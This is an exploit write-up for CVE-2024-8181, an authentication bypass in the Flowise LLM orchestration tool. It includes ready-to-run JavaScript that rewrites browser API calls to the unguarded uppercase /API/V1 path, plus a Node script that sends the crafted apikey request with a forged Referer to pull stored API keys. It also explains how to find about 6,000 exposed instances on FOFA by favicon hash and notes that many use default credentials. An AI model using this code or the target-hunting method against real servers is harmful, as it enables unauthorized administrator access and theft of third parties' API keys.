Flowise is an open source low-code tool for developers to build customized LLM orchestration flow & AI agents.
Basically, the server doesn't apply its authentication check to requests sent to the uppercase endpoint /API/V1, even though it still routes them.
So we just have to rewrite every Ajax request endpoint to its uppercase version, and we can do this client side.
Here's the JavaScript code taken from my gist.
To use it, navigate to a page that does not require authentication (e.g. /tools),
then paste the code into the dev tools console.
Congratulations! The bypass lasts until you manually reload the page.
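For reference, here is an added example of the client-side rewrite described above. It is not the gist code from the post, just one way to do the same thing: it hooks fetch() and XMLHttpRequest.open() in the current page so that every call to /api/v1/ goes out as /API/V1/ instead. The helper names (toUppercaseApiPath, installApiPathRewrite) are my own; the scope parameter exists only so the hook can be tested against a fake window object.

```javascript
// Added example (not the author's gist): rewrite the Flowise frontend's API calls
// so they hit the uppercase /API/V1 prefix that skips the authentication check.
const LOWER = '/api/v1/';
const UPPER = '/API/V1/';

// Pure helper: uppercase the first /api/v1/ path segment, leave everything else alone.
// Works for relative paths ("/api/v1/apikey"), absolute URLs and query strings,
// and refuses to touch an /api/v1/ that only appears inside a query string.
function toUppercaseApiPath(url) {
  if (typeof url !== 'string') return url;
  const idx = url.indexOf(LOWER);
  if (idx === -1) return url;
  const q = url.indexOf('?');
  if (q !== -1 && q < idx) return url;
  return url.slice(0, idx) + UPPER + url.slice(idx + LOWER.length);
}

// Hook fetch() and XMLHttpRequest.prototype.open() on `scope` (window in a browser).
// Returns a function that restores the originals. Because the hooks live only in
// the page's JS context, a manual reload throws them away, as the post notes.
function installApiPathRewrite(scope = globalThis) {
  const origFetch = scope.fetch;
  const XHR = scope.XMLHttpRequest;
  const origOpen = XHR && XHR.prototype.open;

  if (typeof origFetch === 'function') {
    scope.fetch = function (input, init) {
      if (typeof input === 'string') {
        input = toUppercaseApiPath(input);
      } else if (input && typeof input.url === 'string' && typeof scope.Request === 'function') {
        // A Request object: rebuild it with the rewritten URL, keeping method/headers/body.
        input = new scope.Request(toUppercaseApiPath(input.url), input);
      }
      return origFetch.call(this, input, init);
    };
  }
  if (origOpen) {
    XHR.prototype.open = function (method, url, ...rest) {
      return origOpen.call(this, method, toUppercaseApiPath(String(url)), ...rest);
    };
  }
  return function uninstall() {
    if (typeof origFetch === 'function') scope.fetch = origFetch;
    if (origOpen) XHR.prototype.open = origOpen;
  };
}

// When pasted into a browser console this installs itself on the page; under Node
// (no window) it only defines the helpers.
if (typeof window !== 'undefined') installApiPathRewrite(window);
```

Paste the whole block into the dev tools console on an unauthenticated page such as /tools and then navigate inside the single-page app without reloading; every API call the frontend makes from that point on goes to the uppercase path.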
Usually there are stored API keys for various services.
[*] flowise_authbypass.png
CVE-2024-8181
"An Authentication Bypass vulnerability exists in Flowise version 1.8.2.
This could allow a remote, unauthenticated attacker to access API endpoints as an administrator and allow them to access restricted functionality."
-nvd.nist.gov
While reading this nuclei template I found out how to exploit the vulnerability.
So, testing with Burp Suite, I got the expected behavior by requesting the URL path /api/v1/apikey?/api/v1/ping with the header Referer: [BASE URL]/document-stores added: the response came back with the stored API keys.
[*] flowise_apikeys.png
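The same Burp request, turned into a small scriptable check, as an added example (it is not code from the post or from the nuclei template the post mentions). It assumes Node 18+ for the global fetch(), a base URL you are authorised to test, and that a vulnerable host answers the /apikey route with a JSON array of key records; the field names in the sample body are an assumption about that response shape, the classification only relies on status code and the body being a JSON list.

```javascript
// Added example: reproduce the request from the text as a repeatable check.
// Assumes Node 18+ (global fetch) and a target you are allowed to test.

// Build the exact request described in the post: path /api/v1/apikey?/api/v1/ping
// plus a Referer pointing at the /document-stores page of the same host.
function buildProbe(baseUrl) {
  const base = baseUrl.replace(/\/+$/, ''); // strip trailing slashes
  return {
    url: `${base}/api/v1/apikey?/api/v1/ping`,
    headers: { Referer: `${base}/document-stores` },
  };
}

// Decide from status + body whether the unauthenticated request was served.
// A host that enforces auth answers 401/403; one that serves the route returns
// 200 with a JSON array of key records (the array shape is an assumption).
function classifyResponse(status, bodyText) {
  if (status === 401 || status === 403) return { vulnerable: false, reason: 'auth enforced' };
  if (status !== 200) return { vulnerable: false, reason: `unexpected status ${status}` };
  let body;
  try {
    body = JSON.parse(bodyText);
  } catch {
    return { vulnerable: false, reason: 'non-JSON body' };
  }
  if (!Array.isArray(body)) return { vulnerable: false, reason: 'not a list' };
  return { vulnerable: true, keys: body.length, reason: 'apikey route served without auth' };
}

// Send the probe to a live host and classify the answer.
async function probe(baseUrl) {
  const { url, headers } = buildProbe(baseUrl);
  const res = await fetch(url, { headers, redirect: 'manual' });
  return classifyResponse(res.status, await res.text());
}

// Usage from a shell: node probe.js http://localhost:3000
if (typeof require !== 'undefined' && require.main === module && process.argv[2]) {
  probe(process.argv[2]).then((r) => console.log(JSON.stringify(r)));
}
```

The ?/api/v1/ping suffix and the Referer header are the two ingredients the post's Burp request needed; keep them exactly as built above when retesting a host after patching, so a 401 on the same request is a meaningful before/after comparison.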
Looking for vulnerable targets
Its favicon hash is -2051052918; knowing this, we just have to search for it on FOFA,
which gives us more than 6k results.
[*] fofa_results.png
By the way, most of these results have no login at all or use admin:admin, bruh. This is because AI has been a hot topic these last few years,
so inexperienced people and companies will find a way to use an LLM for anything, appropriate or not.